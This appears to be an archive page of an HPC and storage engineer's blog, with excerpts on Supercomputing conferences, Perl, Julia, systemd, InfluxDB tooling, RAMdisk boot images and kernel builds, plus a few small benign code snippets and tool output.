SC14 T minus 6 and counting
Scalable’s booth is #3053. We’ll have some good stuff, demos, talks, and people there. And coffee. Gotta have the coffee. More soon, come by and visit us!
Posts
#SC11 T minus 3 days and counting
Ok. Let’s call this an absolutely wild ride so far. I mean, it’s freaking insane. I cannot remember working so hard and so fast. First off Tiburon, our cluster software package (designed mostly for HPC Storage, and cluster like things) has been an insanely awesome trouper. It just works. And I mean that in a jaw dropping manner. It just freaking works. Part of it may be due to the simplicity of the thing.
Posts
SC'05 wrap up
This took me a while to post in part due to heavy year end load, but also, that I wanted to think through what I did see, and what I didn’t. It is important in many processes to take a moment, step back from where you are, and try to assemble the bigger picture of the situation. This introspection can yield invaluable insights. Failing to do it can blind you to what was there, with you focusing mostly on the minutiae.
Posts
Till we meet again ... in Tampa! (not Orlando... Do'h!)
Well, this is the day we had to leave. We saw many things, met many people, had many good conversations. Oddly enough we did not have time to attend talks. I sat in on one BOF. Here is what I observed. IBM is pushing Blue Gene everywhere. In the sessions I did see or hear about from others, it appears that IBM operatives/employees were trying to make a case, even when told that infinite speed wasn’t the issue.
Posts
SC'05 sessions
We had wanted to see several of the sessions including the ClawHmmer, and various others. I spent most of my time talking with various vendors and others on the show floor. ClawHmmer is interesting as it is a GPU version of HMMer, and on good GPU hardware, you can get quite a performance boost on HMMer. The only problem we see is that most servers don’t have good hardware accelerated GPUs.
Posts
SC'05 full day 1 (Tuesday)
This morning, SC'05 featured a keynote address from Bill Gates, CTO and founder of Microsoft. Prior to the keynote, we watched a video loop, and we heard from the heads of the ACM, and the president-elect of the IEEE, as well as the chairperson of the board for SC'06 in Tampa Florida. The president-elect gave a good and short talk on a number of things, including the need to get more women and minorities into the profession.
Posts
SC'05 begins ...
At 7pm PST the network was officially lit with the _traditional cutting of the optical fibre_, then a ribbon was cut with a large pair of wooden-handled scissors. Long lines were formed, and much food was consumed. The best thing I saw at the show today is the LightSpace Technology display. The molecular display demo is great, as was the visual human work. The way it works is a very bright digital light pipe technology coupled with diffusive planes for drawing images.
Posts
SC'05 T -1 and counting
The Sun HPCC group had some nice talks from folks doing real science. Specifically I did get to see a talk on path-integral formalism of molecular dynamics, another on using support vector machines for feature identification in patients with Glaucoma. Also saw quite a bit of stuff we cannot talk about, but it was quite interesting. All in all, a fun time was had by all, but we cannot post pictures as most of the bits were under non-disclosure.
Posts
Planes, and automobiles (no trains)
Got here… finally. Seattle is largely sold out of hotel rooms, so I had to get rooms near the airport. Only a short drive to the conference. Could be worse. Weather is cool (a.k.a freezing for those from warmer climates) and wet. The car rental person started telling me all about how many times his car was smashed into, right after I declined the extra coverage… Hmmm…. Maybe that old axiom is in place, the selling starts when the customer says “no”.
Posts
Questions to answer at SC05
So there should be lots of folks at SC05 to answer questions about technology, products, performance, TCO, and most anything else connected with supercomputing you could want to ask. Some questions I want to ask are from the good folks at Microsoft (Bill Gates is giving the opening keynote), what specifically their HPC initiative is supposed to give us that we don’t already have? This is not an OS war, or OSS zealotry, just a simple question as to what their offering will bring to the table.
Posts
Anticipation
Much has changed in a year. Last year, a number of companies such as Orion were on the rise and the darlings of the event. Companies such as my former employer SGI had a strong presence, reasonable revenues, and there were thoughts of a possible turn around. Startups that garnered far less attention than they deserved, such as Ammasso were there in a limited fashion. Other startups (mercifully unnamed) that had something of a flash-in-the-pan quality to them seemed abundant.
Category: software
Posts
Well ... that was fun
So … I’ve had this blog since 2005. I installed it from original sources. And WP made upgrades in the 2.x time frame, quite painless.
Or so it seemed.
Slowly, over time, some configuration/settings/whatever got out of whack. And with the last update, from a system originally installed in final form in 2013 or so, something broke.
I am not sure what. But the symptoms were simple … new posts would replace the most recent posts.
Posts
On technology zealotry
I’ve encountered this in my career, at many places. Sadly, early in my career, I participated in some of this. You are a zealot for a particular form of tech if you can see it do no wrong, and decry reports of issues or problems as “attacks”. You are a zealot against a particular form of tech if you cannot see it as a potentially useful and valuable portion of a solution stack, and (often gleefully) amplify reports of issues or problems.
Posts
Interesting post on mixed integer programming for diets ... that has some hilarious output
I am a fan of the Julia language. Tremendously powerful analytical environment, compiled, high performance, easy to understand and use, strongly typed, … there’s a long list of reasons why I like it. If you are doing analytics, modeling, computation in other languages, it is definitely worth a look. Think of it as python, compiled, with multiple dispatch and strong typing … and no indent-as-structure problem. My Julia fanboi-ism aside, there was an interesting blog post about using JuMP, a linear programming environment for Julia.
Posts
Put my Riemann Zeta Function sum reduction code on github
Repo is here: https://github.com/joelandman/rzf. There’s a lightning talk to go along with it, and I’ll make sure I can get it together for this as well.
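For readers unfamiliar with the problem, the sum in question can be sketched as below. This is only a minimal illustration of a Riemann zeta partial sum, not the code from the repo; the function name and the choice to add the smallest terms first are assumptions made for this example.

```python
import math


def zeta_partial_sum(n: float, terms: int) -> float:
    """Approximate zeta(n) by summing 1/k**n for k = 1..terms.

    The loop runs from the largest k down to 1 so that the smallest
    terms are accumulated first, which limits floating point rounding error.
    """
    total = 0.0
    for k in range(terms, 0, -1):
        total += 1.0 / k**n
    return total


approx = zeta_partial_sum(2, 100_000)
exact = math.pi**2 / 6  # known closed form for zeta(2)
print(f"partial sum: {approx:.8f}, closed form: {exact:.8f}")
```

Because every term is independent of the others, this kind of loop is a natural candidate for vectorization and parallel reduction experiments.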
Posts
Disk, SSD, NVMe preparation tools cleaned up and on GitHub
These are a collection of (MIT licensed) tools I’ve been working on for years to automate some of the major functionality one needs when setting up/using new machines with lots of disks/SSD/NVMe. The repo is here: https://github.com/joelandman/disk_test_setup . I will be adding some sas secure erase and formatting tools into this. These tools wrap other lower level tools, and handle the process of automating common tasks you worry about when you are setting up and testing a machine with many drives.
Posts
Aria2c for the win!
I’ve not heard of aria2c before today. Sort of a super wget as far as I could tell. Does parallel transfers to reduce data motion time, if possible. So I pulled it down, built it. I have some large data sets to move. And a nice storage area for them. Ok. Fire it up to pull down a 2GB file. Much faster than wget on the same system over the same network.
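The general idea behind a parallel transfer can be sketched as splitting a file into byte ranges that are fetched concurrently. The following is an illustration of that idea only, not aria2c's actual implementation; the function name is hypothetical, and the inclusive `(start, end)` pairs are chosen to match the form used by HTTP `Range: bytes=start-end` requests.

```python
def split_byte_ranges(size: int, parts: int):
    """Split `size` bytes into at most `parts` contiguous, inclusive
    (start, end) ranges that together cover bytes 0..size-1."""
    if size <= 0 or parts <= 0:
        raise ValueError("size and parts must be positive")
    parts = min(parts, size)           # never create empty ranges
    base, extra = divmod(size, parts)  # first `extra` ranges get one more byte
    ranges = []
    start = 0
    for i in range(parts):
        length = base + (1 if i < extra else 0)
        ranges.append((start, start + length - 1))
        start += length
    return ranges


# A 2GB file split across 4 hypothetical connections.
for start, end in split_byte_ranges(2 * 1024**3, 4):
    print(f"bytes={start}-{end}")
```

Each range could then be handed to its own connection, with the pieces written into place at their offsets in the output file.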
Posts
Oracle finally kills off Solaris and SPARC
This was making the rounds last week. Oracle seems to have a leak in its process, creating labels that trigger event notifications for people, for their packages. Solaris was decimated. More details at the links and at The Layoff. Honestly I had expected them to reach this point. I am guessing that they were contractually obligated for at least 7 years to provide Solaris/SPARC support to US government purchasers. SGI went through a similar thing with IRIX.
Posts
Finally got to use MCE::* in a project
There are a set of modules in the Perl universe that I’ve been looking for an excuse to use for a while. They are the MCE set of modules, which purportedly enable easy concurrency and parallelism, exploiting many core CPUs, and a number of techniques. Sure enough, I had a task to handle recently that required this. I looked at many alternatives, and played with a few, including Parallel::Queue. I thought of writing my own with IPC::Run as I was already using it in the project, but I didn’t want to lose focus on the mission, and re-invent a wheel that already existed elsewhere.
Posts
What reduces risk ... a great engineering and support team, or a brand name ?
I’ve written about approved vendors and “one throat to choke” concept in the past. The short take from my vantage point as a small, not well known, but highly differentiated builder of high performance storage and computing systems … was that this brand specific focus was going to remove real differentiated solutions from market, while simultaneously lowering the quality and support of products in market. The concept of brand and marketing of a brand is about erecting barriers to market entry against the smaller folk who might have something of interest, and the larger folk who might come in with a different ecosystem.
Posts
On hackerrank and Julia
My new day job has me developing considerably less code than my previous endeavor, so I like to work on problems to keep these particular muscles in steady use. Happily, I get to do more analytics than ever before, so this at least is some compensation for the lower amount of coding. When I work on coding for myself, I’ll play with problems from my research days, or small throw-away ones, like on Hackerrank.
Posts
pcilist: because sometimes you really, really need to know how your PCIe devices are configured
If you don’t know what I am talking about here, that’s fine. I’ll assume you don’t do hardware, or you call someone else when there is a hardware problem. If you think “well gee, don’t we have lspci? so why do we need this?” then you probably have not really tried to use lspci to find this information, or didn’t know it was available. Ok … what I am talking about.
Posts
What is old, is new again
Way back in the pre-history of the internet (really DARPA-net/BITNET days), while dinosaur programming languages frolicked freely on servers with “modern” programming systems and data sets, there was a push to go from statically linking programs to a more modular dynamic linking. The thought processes were that it would save precious memory, not having many copies of libc statically linked in to binaries. It would reduce file sizes, as most of your code would be in libraries.
Posts
That was fun: mysql update nuked remote access
Update your packages, they said. It will be more secure, they said. I guess it was. No network access to the databases. Even after turning the database server instance to listen again on the right port, I had to go in and redo the passwords and privileges. So yeah, this broke my MySQL instance for a few hours. Took longer to debug as it was late at night and I was sleepy, so I put it off until morning with caffeine.
Posts
An article on Rust language for astrophysical simulation
It is a short read, and you can find it on arxiv. They tackled an integration problem, basically using the code to perform a relatively simple trajectory calculation for a particular N-body problem. A few things leapt out at me during my read. First, the example was fairly simplistic … a leapfrog integrator, and while it is a symplectic integrator, this particular algorithm is not quite high enough order to capture all the features of the N-body interaction they were working on.
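For reference, a leapfrog integrator in its kick-drift-kick form can be sketched in a few lines. This is a generic illustration on a one-dimensional harmonic oscillator, not the Rust code from the article; the function names, step size, and test problem are assumptions chosen for the example.

```python
def leapfrog(x, v, accel, dt, steps):
    """Advance position x and velocity v using kick-drift-kick leapfrog.

    `accel` is a function returning the acceleration at a given position.
    The scheme is second order accurate in dt and symplectic.
    """
    a = accel(x)
    for _ in range(steps):
        v += 0.5 * dt * a   # half kick
        x += dt * v         # full drift
        a = accel(x)        # acceleration at the new position
        v += 0.5 * dt * a   # second half kick
    return x, v


def oscillator_energy(x, v):
    """Total energy of a unit mass, unit spring constant oscillator."""
    return 0.5 * v * v + 0.5 * x * x


# Unit harmonic oscillator: a(x) = -x, starting at x = 1, v = 0.
x, v = leapfrog(1.0, 0.0, lambda pos: -pos, dt=0.01, steps=10_000)
print(f"energy drift: {abs(oscillator_energy(x, v) - 0.5):.2e}")
```

The energy error stays bounded over long runs rather than growing steadily, which is the practical benefit of a symplectic scheme, but the method remains second order, which is the limitation noted above.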
Posts
Brings a smile to my face ... #BioIT #HPC accelerator
Way way back in the early aughts (2000’s), we had built a set of designs for an accelerator system to speed up things like BLAST, HMMer, and other codes. We were told that no one would buy such things, as the software layer was good enough and people didn’t want black boxes. This was part of an overall accelerator strategy that we had put together at the time, and were seeking to raise capital to build.
Posts
when you eliminate the impossible, what is left, no matter how improbable, is likely the answer
This is a fun one. A customer has quite a collection of all-flash Unison units. A while ago, they asked us to turn on LLDP support for the units. It has some value for a number of scenarios. Later, they asked us to turn it off. So we removed the daemon. Unison ceased generating/consuming LLDP packets. Or so we thought. Fast forward to last week. We are being told that LLDP PDUs are being generated by the kit.
Posts
A new #HPC project on github, nlytiq-base
Another itch I’ve been wanting to scratch for a very long time. I had internal versions of a small version of this for a while, but I wasn’t happy with them. The makefiles were brittle. The builds, while automated, would fail, quite often, for obscure reasons. And I want a platform to build upon, to enable others to build upon. Not OpenHPC which is more about the infrastructure one needs for building/running high performance computing systems.
Posts
#Perl on the rise for #DevOps
Note: I do quite a bit of development in Perl, and have my own biases, so please do take this into consideration. It is one of many languages I use, but it is by and large, my current go-to language. I’ll discuss below. According to TIOBE (yeah, I know), Perl usage is on the rise. The linked article posits that this is for DevOps reasons. The author of the article works at a company that makes money from Perl and Python … they build (actually very good) tools.
Posts
Another itch scratched
So there you are, with many software RAIDs. You’ve been building and rebuilding them. And somewhere along the line, you lost track of which devices were which. So somehow you didn’t clean up the last build right, and you thought you had a hot spare … until you looked at /proc/mdstat … and said … Oh … So. I wanted to do the detailed accounting, in a simple way. I want the tool to tell me if I am missing a physical drive (e.
Posts
ClusterHQ dies
ClusterHQ is now dead. They were an early container play, building a number of tools around Docker/etc. for the space. Containers are a step between bare metal and VMs. Flocker (ClusterHQ’s product) is open source, and they were looking to monetize it in a different way (not on acquisition, but on support). In this space though, Kubernetes reigns supreme. So competing products/projects need to adapt or outcompete. And it’s very hard to outcompete something like k8s.
Posts
So it seems Java is not free
This article on The Register indicates that Oracle is now working actively to monetize Java use. Given the spate of Java hacks over the years, and the decidedly non-free nature of the language, I suspect we are going to see replacement development language use skyrocket, as people develop in anything-but-Java going forward. Think about the risks … you have a massive platform that people have been using with a fairly large number of compromises (client side certainly) … and now you need to start paying for the privilege of using the platform.
Posts
strace -p is your friend
So there I was, trying to use a serial port on a node which was connected to a serial port on a switch. Which I needed to properly configure the switch. So I light up minicom and get garbage. Great, a baud rate mismatch, easily fixed. Fix it. Connect again. I get the first 10-12 characters … and then garbage. Hmmm. I’d like to pause our story for a moment, and say I had the key insight at this moment … but that would not be true.
Posts
Finding unpatched "features" in distro packages
I generally expect baseline distro packages to be “old” by some measure. Even for more forward thinking distros, they generally (mis)equate age with stability. I’ve heard the expression “bug for bug compatible” when dealing with newer code on older systems. Something about the devil you know vs the devil you don’t. Ok. In this case, Cmake. A good development tool, gaining popularity over autotools and other things. Base SIOS image is on Debian 8.
Posts
On expectations
This has happened multiple times over the last few months. Just variations on the theme as it were, so I’ll talk about the theme. The day job builds some of the fastest systems for storage and analytics in market. We pride ourselves on being able to make things go very … very fast. If it’s slow, IMO, it’s a bug. So we often get people contacting us with their requirements. These requirements are often very hard for our competitors, and fairly simple for us to address.
Posts
Excellent article on mistakes made for infrastructure ... cloud jail is about right
Article is here at Firstround capital. This goes to a point I’ve made many many times to customers going the cloud route exclusively rather than the internal infrastructure route or hybrid route. Basically it is that the economics simply don’t work. We’ve used a set of models based upon observed customer use cases, and demonstrated this to many folks (customers, VCs, etc.) Many are unimpressed until they actually live the life themselves, have the bills to pay, and then really … really grok what is going on.
Posts
I don't agree with everything he wrote about systemd, but he isn't wrong on a fair amount of it
Systemd has taken the linux world by storm, replacing 20-ish year old init style processing with a more legitimate control plane, and a centralized resource to handle this control. There are many things to like within it, such as the granularity of control. But there are any number of things that are badly broken by default. Actually some of these things are specifically geared towards desktop users (which isn’t a bad thing if you are a desktop linux user, as I am).
Posts
Hows this for a nice deskside system ... one of our Cadence boxen
For a partner. They made a request for something we’ve not built in a while … it had been end of lifed. One of our old Pegasus units. A portable deskside supercomputer. In this case, a deskside franken-computer … built out of the spare parts from other units in our lab. It started out as a 24 core monster, but we had a power supply burn out, and take the motherboard with it.
Posts
Fully RAMdisk booted CentOS 7.2 based SIOS image for #HPC , #bigdata , #storage etc.
This is something we’ve been working on for a while … a completely clean, as baseline a distro as possible, version of our SIOS RAMdisk image using CentOS (and by extension, Red Hat … just need to point to those repositories). And it’s available to pull down and use as you wish from our download site. Ok, so what does it do? Simple. It boots an entire OS, into RAM. No disks to manage and worry over.
Posts
Raw Unapologetic Firepower: kdb+ from @Kx
While the day job builds (hyperconverged) appliances for big data analytics and storage, our partners build the tools that enable users to work easily with astounding quantities of data, and do so very rapidly, and without a great deal of code. I’ve always been amazed at the raw power in this tool. Think of a concise functional/vector language, coupled tightly to a SQL database. It’s not quite an exact description; have a look at Kx’s website for a more accurate one.
Posts
Systemd and non-desktop scenarios
So we’ve been using Debian 8 as the basis of our SIOS v2 system. Debian has a number of very strong features that make it a fantastic basis for developing a platform … for one, it doesn’t have significant negative baggage/technical debt associated with poor design decisions early on in the development of the system as others do. But it has systemd. I’ve been generally non-committal about systemd, as it seemed like it should improve some things, at a fairly minor cost in additional complexity.
Posts
And this was a good idea ... why ?
The Debian/Ubuntu update tool is named “apt” with various utilities built around it. For the most part, it works very well, and software upgrades nicely. Sort of like yum and its ilk, but it pre-dates them. This tool is meant for automated (e.g. lights out) updates. No keyboard interaction should be required. Ever. For any reason. However … a recent update to one particular package, in Debian, and in Ubuntu, has resulted in installation/updates pausing.
Posts
new SIOS feature: compressed ram image for OS
Most people use squashfs which creates a read-only (immutable) boot environment. Nothing wrong with this, but this forces you to have an overlay file system if you want to write. Which complicates things … not to mention when you overwrite too much, and run out of available inodes on the overlayfs. Then your file system becomes “invalid” and Bad-Things-Happen(™). At the day job, we try to run as many of our systems out of ram disks as we can.
Posts
It is 2016 ... why am I fighting with LDAP authentication in linux? Why doesn't it just work?
Ok … very long story that boils down to us trying to help a customer out. I am trying to avoid the “let’s just add another user to /etc/passwd” or similar such thing. And they aren’t quite ready to hook into AD or similar. So we have this issue. I want to enable their nodes to use ldap. I’ve done this before for other customers with older tools (pam_ldap, etc.). But it was somewhat crazy (as in non-trivial), involving gnashing of teeth, gums, etc.
Posts
The joys of automated tooling ... or ... catching changes in upstream projects workflows by errors in yours
We have an automated build process for our boot images. It is actually quite good, allowing us to easily integrate many different capabilities with it. These capabilities are usually encapsulated in various software stacks that provide specific functionality. Most of these stacks follow pretty well defined workflows. For a number of reasons, we find building from source generally easier than package installation, as there are often some, well, effectively random (and often poor) choices in build options/file placement in the package builds.
Posts
Not a fan of device mapper in Linux
Yeah, I know. It brings all manner of capabilities with it. It’s just the cost of these capabilities, when combined with other tools, like, say, Docker, that makes me not want to use it. To wit:
    root@ucp-01:~# ls -alF /var/lib/docker/devicemapper/devicemapper/
    total 52508
    drwx------ 2 root root 80 Jan 29 22:38 ./
    drwx------ 4 root root 80 Jan 29 22:38 ../
    -rw------- 1 root root 107374182400 Jan 29 22:39 data
    -rw------- 1 root root 2147483648 Jan 29 22:39 metadata
    root@ucp-01:~# ls -halF /var/lib/docker/devicemapper/devicemapper/
    total 52M
    drwx------ 2 root root 80 Jan 29 22:38 .
Posts
When infinite resources aren't, and why software assumes they are infinite
We’ve got customers with very large resource machines. And software that sees all those resources and goes “gimme!!!!”. So people run. And then more people use it. And more runs. Until the resources are exhausted. And hilarity (of the bad kind) ensues. These are firedrills. I get an open ticket that “there must be something wrong with the hardware”, when I see all the messages in console logs being pulled in from ICL saying “zOMG I am out of ram ….
Posts
#Perl6 compiler betas are ready
Ok … I am … well … blown away. I had thought Perl6 would be the Duke Nukem Forever of programming languages. Indeed, it has been in active development for more than a decade. But you can download compilers (yes, you heard me right, compilers) for it now. You might say “why perl” or “why perl6” or “why now, because we have #insert(language_x) and it’s wonderful”. Good question, I wasn’t sure why it was relevant, until I started reading some of the code.
Posts
There are no silver bullets, 2015 edition
In Feb 2013, I opined (with some measure of disgust) that people were looking at various software packages as silver bullets, these magical bits of a stack which could suddenly transform massive steaming piles of bits (big … uh … “data” ?) into golden nuggets of actionable data. Many of the “solutions” marketed these days are exactly like that … “add our magic bean software to your pipeline and you will gain insight faster.
Posts
The 1980s called and want their software licensing models back
So here I am, the day before Thanksgiving, fighting a battle with a reluctant license server that wants to compute a hash of internal bits on a machine, in order to unlock a license key, to let software run. This is not for us, but for a customer. At their site. This is the same model from the 1980s and early 90s. Create a hash from a collection of things (or a dongle you attach to a serial/parallel port).
Posts
A wonderful read on metrics, profiling, benchmarking
Brendan Gregg’s writings are always interesting and informative. I just saw a link on Hacker News to a presentation he gave on “Broken Performance Tools”. It is wonderful, and succinctly explains many things I’ve talked about here and elsewhere, but it goes far beyond what I’ve grumbled over. One of my favorite points in there is slide 83. “Most popular benchmarks are flawed” and a pointer to a paper (easy to google for).
Posts
Shiny #HPC #storage things at #SC15
Assuming everything goes as planned (HA!) we should have a number of very cool things at SC15.
* 100Gb [Unison storage system with BeeGFS](https://scalableinformatics.com/unison)
* 100Gb [Unison Ceph](https://scalableinformatics.com/unison) system
* 100Gb connection to a partner/customer booth
* Forte

100Gb is awesome. The first time I ran an iperf bidirectional test, saw 20GB/s … it blew me away. 40/56GbE is old hat now, and 10GbE is in the rapidly receding past.
Posts
sios-metrics core rewritten
This was a long time coming. Something I needed to do, in order to build a far better code capable of using less network, less CPU power, and providing a better overall system. In short, I ripped out the graphite bits and wrote a native interface to InfluxDB. This interface will also be adapted to kdb+ (32 bit edition), and graphite as time allows. In the process, I cleaned up a tremendous amount of code.
Posts
Updated net-tools bits
So far, 3 components, and working to fix a few things in formatting. On github, grab it here. First, lsbond.pl to report about bond details
    root@unison-mgr-1:~/net-tools# ./lsbond.pl
    bond0: mac 0c:c4:7a:48:69:cb
      state up
      mode fault-tolerance (active-backup)
      xmit_hash layer2 0
      active slave eth1
      polling 100 ms
      up_delay 200 ms
      down_delay 200 ms
      slave nics:
        eth1: mac 0c:c4:7a:48:69:cb, link 1, state up, speed 1000, driver igb, version 5.3.2.2 firmware version 1.61,0x8000090e
    bond1: mac 00:12:c0:80:26:76
      state up
      mode fault-tolerance (active-backup)
      xmit_hash layer2 0
      active slave eth3
      polling 100 ms
      up_delay 200 ms
      down_delay 200 ms
      slave nics:
        eth2: mac 00:12:c0:80:26:76, link 1, state up, speed 10000, driver ixgbe, version 4.
Posts
rebuilding our kernel build system for fun and profit
No, really mostly to clean up an accumulation of technical debt that was really bugging the heck out of me. I like Makefiles and I cannot lie. So I like encoding lots of things in them. But it wound up hardwiring a number of things that shouldn’t have been hardwired. And made the builds brittle. When you have 2 released/supported kernels, and a handful of experimental kernels, it gets hard making changes that will be properly reflected across the set.
Posts
Been there, done that, even have a patent on it
I just saw this about doing a divide and conquer approach to massive scale genomics calculation. While not specific to the code in question, it looked familiar. Yeah, I think I’ve seen something like this before … and wrote the code to do it. It was called SGI GenomeCluster. It was original and innovative at the time, hiding the massively parallel nature of the computation behind a comfortable interface that end users already knew.
Posts
On storage unicorns and their likely survival or implosion
The Register has a great article on storage unicorns. Unicorns are not necessarily mythical creatures in this context, but very high valuation companies that appear to defy “standard” valuation norms, and hold onto their private status longer than those in the past. That is, they aren’t in a rush to IPO or get acquired.
The article goes on to analyze the “storage” unicorns, those in the “storage” field. They admix storage, nosql, hyperconverged, and storage as a service.
Posts
Gmail lossy email system
For months I’ve been noting that my 2 different Gmail accounts (one for work on the business side using the Google Apps for business, and yes, paid for … and one for personal) are not getting all the emails sent to them. I’ve had customers reach out to me here at this site, as well as calling me up to ask me if I’ve been getting their email. Seems I’m not the only one, though the complaint here appears to be a bad filter and characterizing system.
Posts
diagnostics
This is something of a hard post to write, for a number of reasons, not the least of which is that the topic comes as something of a surprise to me. I am just going to state it, and then discuss it. The vast majority of people (and companies) out there who think they know something of hardware/software/system level diagnostics and problem identification (from newbie to “veteran”) are either full of it, or really clueless.
Posts
Interesting Q1 so far for day job
Our Q1 is usually quiet, fairly low key. Not this one. Looks like lots of pent up demand. We are deep into record territory, running 200+% of normal, with possibility of more. Another new wrinkle is that our small investment round is mostly complete. This is new territory for us, and you may have noticed I’d backed off posting intensity over the last half year or so while this was going on.
Posts
influxdb cli queries now with regex
This is the way queries are supposed to work. Note the perl regex in the series name
    unison> select * from /^usn-ramboot.nettotals.kb(in|out)$/ limit 10
    D[23261] Scalable::TSDB::_generate_url; dbquery = 'select * from /^usn-ramboot.nettotals.kb(in|out)$/ limit 10'
    D[23261] Scalable::TSDB::_generate_url; query = 'p=XXXXXXXX&u=scalable&chunked=1&time_precision=s&q=select%20%2A%20from%20%2F%5Eusn-ramboot.nettotals.kb%28in%7Cout%29%24%2F%20limit%2010'
    D[23261] Scalable::TSDB::_generate_url; url = 'http://localhost:8086/db/unison/series?p=XXXXXXX&u=scalable&chunked=1&time_precision=s&q=select%20%2A%20from%20%2F%5Eusn-ramboot.nettotals.kb%28in%7Cout%29%24%2F%20limit%2010'
    D[23261] Scalable::TSDB::_send_chunked_get_query -> reading 0.009837s
    D[23261] Scalable::TSDB::_send_chunked_get_query -> bytes_received = 530B
    D[23261] Scalable::TSDB::_send_chunked_get_query return code = 200
    D[23261] Scalable::TSDB::_send_chunked_get_query cols = [time,sequence_number,usn-ramboot.nettotals.kbin]
    D[23261] Scalable::TSDB::_send_chunked_get_query cols = [time,sequence_number,usn-ramboot.
Posts
InfluxDB cli ready for people to play with
The code is on github. Installation should be simple:

    sudo make INSTALLPATH=/path/where/you/want/it

It will install any needed Perl modules for you. I’ve reduced the dependency set to LWP::UserAgent, Getopt::Lucid, JSON::PP, and some text processing. As much as I like Mojolicious, the UserAgent was 1/10th the speed of LWP for the same work. Once it is done, point it over to an InfluxDB database instance:
landman@metal:~/work/development/influxdbcli$ ./influxdb-cli.pl --user scalable --pass XXXXXXX --host 192.
Posts
Real measurement is hard
I had hinted at this last week, so I figure I better finish working on this and get it posted already. The previous bit with language choice wakeup was about the cost of Foreign Function Interfaces, and how well they were implemented. For many years I had honestly not looked as closely at Python as I should have. I’ve done some work in it, but Perl has been my go-to language.
Posts
When the revolution hits in force ...
Our machines will be there, helping power the genomics pipelines to tremendous performance. Performance is an enabling feature. Without it you cannot even begin to hope to perform massive scale analytics. With it, you can dream impossible dreams. This article came out talking about a massive performance analytics pipeline at Nationwide Children’s Hospital in Ohio. This pipeline runs on a cluster attached to Scalable Informatics FastPath Unison storage. This is a very dense, very fast system, interconnected with Mellanox FDR Infiniband, Chelsio 40GbE, and leveraging BeeGFS from thinkparq.
Posts
Where have you been all my life FFI::Platypus?
Oh my … this is goodness I’ve been missing badly in Perl. Just learned about it this morning. Short version. You want to mix programming languages for implementation of some project. One language makes development of some subset of functions very easy, while another language handles another part very well. You need some sort of layer to handle this usually, or a way to sanely map. FFI is the concept behind this … and while there is no mention of CORBA or XDR/RPC type things, this is the logical follow-on to these (in their time) ground breaking technologies.
Posts
Finally, a desktop Linux that just works
I’ve been a user of Linux on the desktop, as my primary desktop, for the last 16 years. In that time, I’ve had laptops with Windows flavors (95, XP, 2000, 7), a MacOSX desktop. Before that, my first laptop I had bought (while working on my thesis) was a triple boot job, with DOS, Windows 9x, and OS2. I used the latter for when I was traveling and needed to write; the thesis was written in LaTeX and I could easily move everything back and forth between that and my Indy at home, and my office Indigo.
Posts
Anatomy of a #fail ... the internet of broken software stacks
So I’ve been trying to diagnose a problem with my Android devices running out their batteries very quickly. And at the same time, I’ve been trying to understand why my address bar on Thunderbird has taken a very long time to respond. I had made a connection earlier today when I had noticed the 50k+ contacts in my contact list, of which maybe 2000 were unique. I didn’t quite understand it.
Posts
Drivers developed largely out of kernel, and infrequently synced
One of the other aspects of what we’ve been doing has been forward porting drivers into newer kernels, fixing the occasional bug, and often rewriting portions to correct interface changes. I’ve found that subsystem vendors seem to prefer to drop code into the kernel very infrequently. Sometimes they are synced only once every few years. Which leads to distro kernels often having terribly broken device support. And often very unstable device support.
Posts
Parallel building debian kernels ... and why its not working ... and how to make it work
So we build our own kernels. No great surprise, as we put our own patches in, our own drivers, etc. We have a nice build environment for RPMs and .debs. It works, quite well. Same source, same patches, same make file driving everything. We get shiny new and happy kernels out the back end, ready for regression/performance/stability testing. Works really well. But … but … parallel builds (e.g. leveraging more than 1 CPU) work only for the RPM builds.
Posts
Amusing #fail
I use Mozilla’s Thunderbird mail client. For all its faults, it is still the best cross platform email system around. Apple’s mail client is a bad joke and only runs on Apple devices (go figure). Linux’s many offerings are open source, portable, and most don’t run well on my Mac laptop. I no longer use Windows apart from running in a VirtualBox environment. And I would never go back to Outlook anyway (used it once, 15 years ago or so … never again).
Posts
Systemd, and the future of Linux init processing
An interesting thing happened over the last few months and years. Systemd, a replacement init process for Linux, gained more adherents, and supplanted the older style init.d/rc scripting in use by many distributions. Ubuntu famously abandoned init.d style processing in favor of upstart and others in the past, and has been rolling over to systemd. Red Hat rolled over to systemd. As have a number of others. Including, surprisingly, Debian. For those who don’t know what this is, think of it this way.
Posts
Brings a smile to my face
My soon to be 15 year old daughter was engrossed with something on her laptop yesterday. Thinking it was fan-fiction, I asked her what she was writing. She knitted her brow for a moment, and looked up. “It’s code combat, Dad,” she said, quite matter-of-factly. I must have had a slightly startled expression on my face. I knew she had dabbled with it, and had recommended (/sigh) Python as a language, after she took (and aced) a Java class last year, as Python is inherently simpler.
Posts
Starting to come around to the idea that swap in any form, is evil
Here’s the basic theory behind swap space. Memory is expensive, disk is cheap. Only use the faster memory for active things, and aggressively swap out the less used things. This provides a virtual address space larger than physical/logical memory. Great, right? No. Here’s why.
Swap makes the assumption that you can always write/read to persistent memory (disk/swap). It never assumes persistent memory could have a failure. Hence, if some amount of paged data on disk suddenly disappeared, well … Put another way, it increases your failure likelihood, by involving components with higher probability of failure in a pathway which assumes no failure.
Posts
Mixing programming languages for fun and profit
I’ve been looking for a simple HTML5-ish way to represent our disk drives in our Unison units. I’ve been looking for some simple drawing libraries in javascript to make this higher level, so I don’t have to handle all the low level HTML5 bits. I played with Raphael and a few others (including paper.js). I wound up implementing something in Raphael.
The code that generated this was a little unwieldy … as javascript doesn’t quite have all the constructs one might expect from a modern language.
Posts
And the 0.8.3 InfluxDB no longer works with the InfluxDB perl module
I ran into this a few weeks ago, and am just getting around to debugging it now. Traced the code, set up a debugger and followed the path of execution, and … and … Yup, it’s borked. So, I can submit a patch or 3 against the InfluxDB code, or roll a simpler more general Time Series Data Base interface that will talk to InfluxDB. And eventually kdb+. Since I wanted to code for that as well, I am looking more seriously at the second option.
Posts
Shellshock is worse than heartbleed
In part because, well, the patches don’t seem to cover all the exploits. For the gory details, look at the CVE list here. Then cut and paste the local exploits. Even with the latest patched source, built from scratch, there are active working compromises. With heartbleed, all we had to do was nuke keys, patch/update packages, restart machines, cross fingers. This is worse, in that the fixes … well … don’t.
Posts
Updated boot tech in Scalable OS (SIOS)
This has been an itch we’ve been working on scratching a few different ways, and it’s very much related to forgoing distro based installers. Ok, first the back story. One of the things that has always annoyed me about installing systems has been the fundamental fragility of the OS drive. It doesn’t matter if it’s RAIDed in hardware/software. It’s a pathway that can fail. And when it fails, all hell breaks loose.
Posts
Solved the major socket bug ... and it was a layer 8 problem
